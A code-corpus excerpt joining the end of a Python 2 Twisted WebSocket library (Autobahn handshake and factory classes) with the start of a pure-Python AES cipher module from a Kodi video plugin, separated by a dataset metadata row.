self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self,
## WebSockect session parameters
url = None,
protocols = [],
server = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnWebSockets/x.x.x").
:type server: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSockets protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performaing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSockets protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSockets.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSockets opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %d\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
def processHandshake(self):
"""
Process WebSockets opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % sl[2].strip()
else:
reason = ""
return self.failHandshake("WebSockets connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extension, but if we did, we needed
## to set self.websocket_extensions_in_use here, and don't fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrical to server-side .. that is, give the
## client a chance to bail out .. i.e. on no subprotocol selected
## by server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self,
## WebSockect session parameters
url = None,
origin = None,
protocols = [],
useragent = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSockets opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSockets opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnWebSockets/x.x.x").
:type useragent: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSockets protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSockets draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
| apache-2.0 | 1,140,141,229,421,386,400 | 36.960267 | 212 | 0.603311 | false |
bruno-briner/plugin.video.brplay | resources/lib/hlsproxy/decrypter.py | 1 | 16632 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Simple AES cipher implementation in pure Python following PEP-272 API
Based on: https://bitbucket.org/intgr/pyaes/ to compatible with PEP-8.
The goal of this module is to be as fast as reasonable in Python while still
being Pythonic and readable/understandable. It is licensed under the permissive
MIT license.
Hopefully the code is readable and commented enough that it can serve as an
introduction to the AES cipher for Python coders. In fact, it should go along
well with the Stick Figure Guide to AES:
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Contrary to intuition, this implementation numbers the 4x4 matrices from top to
bottom for efficiency reasons::
0 4 8 12
1 5 9 13
2 6 10 14
3 7 11 15
Effectively it's the transposition of what you'd expect. This actually makes
the code simpler -- except the ShiftRows step, but hopefully the explanation
there clears it up.
"""
####
# Copyright (c) 2010 Marti Raudsepp <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
####
from array import array
# Globals mandated by PEP 272:
# http://www.python.org/dev/peps/pep-0272/
MODE_ECB = 1
MODE_CBC = 2
#MODE_CTR = 6
block_size = 16
# variable length key: 16, 24 or 32 bytes
key_size = None
class AESDecrypter():
MODE_CBC=2
def new(self, key, mode, IV=None):
if mode == MODE_ECB:
return ECBMode(AES(key))
elif mode == MODE_CBC:
if IV is None:
raise ValueError("CBC mode needs an IV value!")
return CBCMode(AES(key), IV)
else:
raise NotImplementedError
#### AES cipher implementation
class AES(object):
block_size = 16
def __init__(self, key):
self.setkey(key)
def setkey(self, key):
"""Sets the key and performs key expansion."""
self.key = key
self.key_size = len(key)
if self.key_size == 16:
self.rounds = 10
elif self.key_size == 24:
self.rounds = 12
elif self.key_size == 32:
self.rounds = 14
else:
raise ValueError("Key length must be 16, 24 or 32 bytes")
self.expand_key()
def expand_key(self):
"""Performs AES key expansion on self.key and stores in self.exkey"""
# The key schedule specifies how parts of the key are fed into the
# cipher's round functions. "Key expansion" means performing this
# schedule in advance. Almost all implementations do this.
#
# Here's a description of AES key schedule:
# http://en.wikipedia.org/wiki/Rijndael_key_schedule
# The expanded key starts with the actual key itself
exkey = array('B', self.key)
# extra key expansion steps
if self.key_size == 16:
extra_cnt = 0
elif self.key_size == 24:
extra_cnt = 2
else:
extra_cnt = 3
# 4-byte temporary variable for key expansion
word = exkey[-4:]
# Each expansion cycle uses 'i' once for Rcon table lookup
for i in xrange(1, 11):
#### key schedule core:
# left-rotate by 1 byte
word = word[1:4] + word[0:1]
# apply S-box to all bytes
for j in xrange(4):
word[j] = aes_sbox[word[j]]
# apply the Rcon table to the leftmost byte
word[0] ^= aes_Rcon[i]
#### end key schedule core
for z in xrange(4):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
# Last key expansion cycle always finishes here
if len(exkey) >= (self.rounds + 1) * self.block_size:
break
# Special substitution step for 256-bit key
if self.key_size == 32:
for j in xrange(4):
# mix in bytes from the last subkey XORed with S-box of
# current word bytes
word[j] = aes_sbox[word[j]] ^ exkey[-self.key_size + j]
exkey.extend(word)
# Twice for 192-bit key, thrice for 256-bit key
for z in xrange(extra_cnt):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
self.exkey = exkey
def add_round_key(self, block, round):
"""AddRoundKey step. This is where the key is mixed into plaintext"""
offset = round * 16
exkey = self.exkey
for i in xrange(16):
block[i] ^= exkey[offset + i]
#print 'AddRoundKey:', block
def sub_bytes(self, block, sbox):
"""
SubBytes step, apply S-box to all bytes
Depending on whether encrypting or decrypting, a different sbox array
is passed in.
"""
for i in xrange(16):
block[i] = sbox[block[i]]
#print 'SubBytes :', block
def shift_rows(self, b):
"""
ShiftRows step in AES.
Shifts 2nd row to left by 1, 3rd row by 2, 4th row by 3
Since we're performing this on a transposed matrix, cells are numbered
from top to bottom first::
0 4 8 12 -> 0 4 8 12 -- 1st row doesn't change
1 5 9 13 -> 5 9 13 1 -- row shifted to left by 1 (wraps around)
2 6 10 14 -> 10 14 2 6 -- shifted by 2
3 7 11 15 -> 15 3 7 11 -- shifted by 3
"""
b[1], b[5], b[9], b[13] = b[5], b[9], b[13], b[1]
b[2], b[6], b[10], b[14] = b[10], b[14], b[2], b[6]
b[3], b[7], b[11], b[15] = b[15], b[3], b[7], b[11]
#print 'ShiftRows :', b
def shift_rows_inv(self, b):
"""
Similar to shift_rows above, but performed in inverse for decryption.
"""
b[5], b[9], b[13], b[1] = b[1], b[5], b[9], b[13]
b[10], b[14], b[2], b[6] = b[2], b[6], b[10], b[14]
b[15], b[3], b[7], b[11] = b[3], b[7], b[11], b[15]
#print 'ShiftRows :', b
def mix_columns(self, block):
"""MixColumns step. Mixes the values in each column"""
# Cache global multiplication tables (see below)
mul_by_2 = gf_mul_by_2
mul_by_3 = gf_mul_by_3
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_by_2[v0] ^ v3 ^ v2 ^ mul_by_3[v1]
block[col + 1] = mul_by_2[v1] ^ v0 ^ v3 ^ mul_by_3[v2]
block[col + 2] = mul_by_2[v2] ^ v1 ^ v0 ^ mul_by_3[v3]
block[col + 3] = mul_by_2[v3] ^ v2 ^ v1 ^ mul_by_3[v0]
#print 'MixColumns :', block
def mix_columns_inv(self, block):
"""
Similar to mix_columns above, but performed in inverse for decryption.
"""
# Cache global multiplication tables (see below)
mul_9 = gf_mul_by_9
mul_11 = gf_mul_by_11
mul_13 = gf_mul_by_13
mul_14 = gf_mul_by_14
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_14[v0] ^ mul_9[v3] ^ mul_13[v2] ^ mul_11[v1]
block[col + 1] = mul_14[v1] ^ mul_9[v0] ^ mul_13[v3] ^ mul_11[v2]
block[col + 2] = mul_14[v2] ^ mul_9[v1] ^ mul_13[v0] ^ mul_11[v3]
block[col + 3] = mul_14[v3] ^ mul_9[v2] ^ mul_13[v1] ^ mul_11[v0]
#print 'MixColumns :', block
def encrypt_block(self, block):
